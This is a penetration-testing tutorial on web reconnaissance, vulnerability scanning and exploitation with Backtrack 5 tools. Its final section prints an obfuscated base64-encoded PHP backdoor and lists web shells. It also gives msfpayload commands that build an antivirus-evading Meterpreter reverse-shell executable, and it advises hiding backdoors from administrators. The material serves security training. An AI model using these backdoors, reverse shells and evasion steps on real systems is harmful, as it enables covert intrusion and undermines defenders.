Hacking

Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5

Hari Krishnan
December 17, 2011 by
Hari Krishnan

Web application analysis plays a major role while doing a vulnerability assessment/penetration test. Proper information about the web application (for example like type of plugins used; CMS type – whether it is joomla, wordpress, etc.) can help the pentester determine the right exploit to use, as well reduce the overall time spent in doing so.

Backtrack 5 comes with a very good set of tools required for performing all necessary information gathering. Tools for performing web application analysis are:

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

CMS Identification:

  • blindelephant
  • cms-explorer
  • whatweb

 

BlindElephant

BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files.

The tool is fast, non-invasive, takes low bandwidth and is highly automated.

Usage:

root@root:/pentest/web/blindelephant/src/blindelephant#python BlindElephant.py [options] url appName

We can use the appName as "guess" if we are not sure about the web application or plugin type used.

CMS-Explorer

CMS-explorer is another web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT.

Usage:

root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options]

WhatWeb

WhatWeb is again used to identify the type of content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries and servers used. This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth.

Usage:

root@root:/pentest/web/whatweb# ./whatweb target.com

./whatweb –l will list the plugin list.

IDS-IPS detection

While performing a VA/PT on a domain, there is the chance that IDS-IPS is installed. This can sometime stop various types of attacks performed on the domain. A lot of WAFs are sold to companies as a valid mitigation technique for web application vulnerabilities.

Luckily, WAF is easy to detect because most of these use signature-based detection methods. Thus, the attacker can try to encode the attacking parameters and try to bypass the WAFs. Backtrack comes with two handy tools for detecting the IDS-IPS and they are

  • waffit
  • ua-tester

Waffit:

Waffit is a web application firewall detection tool. Detecting the firewall behind the domain is a very important step during the penetration testing process. WAF can sometimes introduce vulnerabilities if it's not configured. Analyzing them is also a major concern while doing a VA/PT. WAFs are usually easy to detect and they can be bypassed by encoding the attack parameters .

Usage:

root@root:~$python wafw00f.py http://www.target.com/

Open-Source Analyses:

Open-source analyses are conducted using tools like ghdb, revhosts, xssed, maltego . The ghdb and xssed are linked to websites, while the other two are tools.

GHDB:

GHDB stands for Google Hacking Database. The exploit-db team maintains a database for google dorks which can come handy for pentesters gathering information. We can use the dorks for finding certain types of vulnerable servers or other information.

For example, a google dork like "Microsoft-IIS/6.0" intitle:index.of" can be used to detect the server which is running Microsoft IIS 6.0. Another advantage of this is that it gives a little anonymity, as well as helping pen testers to attack or perform a VA with more precision.

Xssed:


Xssed.com is another website that contains a list of cross-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT.

Revhosts:

Revhosts is a project for Passive information Gathering. It's written in Python and likewise helps pentesters to gather information (i.e., the host, VirtualHost, DNS entry, directories, mail address, subnet, etc.). This tool comes both in GUI and console.

Web Crawlers:

The final category of web application analyses is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console based. Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication

Webshag has options like port scan, gathering basic information, spider, fuzzing

Downlink: http://www.scrt.ch/en/attack/downloads/webshag.

Vulnerability Assessment and exploitation:

The vulnerability assessment stage is where we scan our target for any loopholes or bugs. Before doing a vulnerability assessment, gathering information about the target will be more helpful. The information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example in the first stage: in using the CMS scanners like BlindElephant, we scanned and found the version of the application installed. Here it is: joomla. Now in the Vulnerability assessment stage, we used scanner like joomscan. Below is the image showing the vulnerability in a particular site.

Usage:

./joomscan.pl –u www.target.com or IP address

The joomscan scans all the plug-ins installed and gives details about the vulnerabilities. We can use this information for further attacks.

SqlMap:


SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is vulnerable or not. Below is the example, where the highlighted text tells us that the parameter "newId" is vulnerable. The usage is as follows:

./sqlmap.py –u target.com -f

Fimap:

fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. More modules and functionalities are being added to this tool, making it even more powerful. Fimap also allows us to add our own payloads.

Usage:

fimap -u http://www.example.com/index.php?inc=index.php

-U defines the target url


To scan a list of url from a text file, the command would be

fimap -m -l '/tmp/urlscan.txt'

  • -m is for mass scanning
  • -l is for list
  • Scan websites using google dorks
  • .fimap.py -g -q 'inurl:include.php'
  • -g for searching from google
  • -q stands for the query which is to be searched in google.

Fimap can exploit the vulnerable target and can also upload an interactive shell for more exploitation

Xsser:

Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection.

Usage:

./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666″–user-agent"correctaudit" 

This tool gives information like attack url, browsers and the method of the attack. Once the vulnerable url is detected, we can open the url and check it to confirm.

theHarvestor:

theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. It can be found in the "Web open source assessment " option under web vulnerability assessment.

Usage:

./theHaervester.py –ld [target domain] –d [ data source]

The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target.

Shodan:

This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be:

Syntax: Hostname:target.com port:80,21,22

Or simply to find out the results about the hostname, then simply search for

Syntax: Hostname:target.com

W3af:

W3af is auditing and web application attack tool. It's basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing.


The below diagram shows a brief flowchart of the target website and makes it's more easy to understand.

Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation.

Once the vulnerability is found, we can configure the plugins in the "Exploit" tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also.

Maintaining Access:

Once we have access to the target website, we need to maintain access for future use because we don't want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors.

BT5 comes with few good options for uploading webshells.

Weevely:

Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely.

 

eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));

 

Usage: To create a backdoor.

Weevely.py –g –o filename –p password

This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command:

Usage:

weevely.py –t –u http://Remote-IP/backdoor.php -p infosec

Webshells:


Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. The following web shells available are

  • simple-backdoor.php
  • php-backdoor.php
  • jsp-reverse.jsp
  • cmdjsp.jsp
  • cmd-asp-5.1.asp
  • cmdasp.aspx
  • perlcmd.cgi
  • cfexec.cfm

MsfPayload:


Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows:

We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be:

msf > msfpayload windows/meterpreter/reverse_tcp

 

This payload needs two parameters: LHOST (attackers IP address), and the LPORT for selecting the port that we are going to use. The "R" is then used to give the output file in RAW data format so that we can encode it later on.

Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

 

This will create the payload but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe ("|") the output generated by msfpayload to msfencode.

Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe 

-e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding and –t for the type of file extension. Here it's an exe file. Below is the image of the list of encoders available in MSF.

Conclusion:

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.


These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and if necessary, upload a backdoor. As I've said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerability, exploiting and how to maintain access in your target.

Hari Krishnan
Hari Krishnan

Hari Krishnan works as a security and bug researcher for a private firm, as well as InfoSec Institute. His interests largely encompass web application security issues. Hari is also an organizer for Defcon Chennai (http://www.defcontn.com).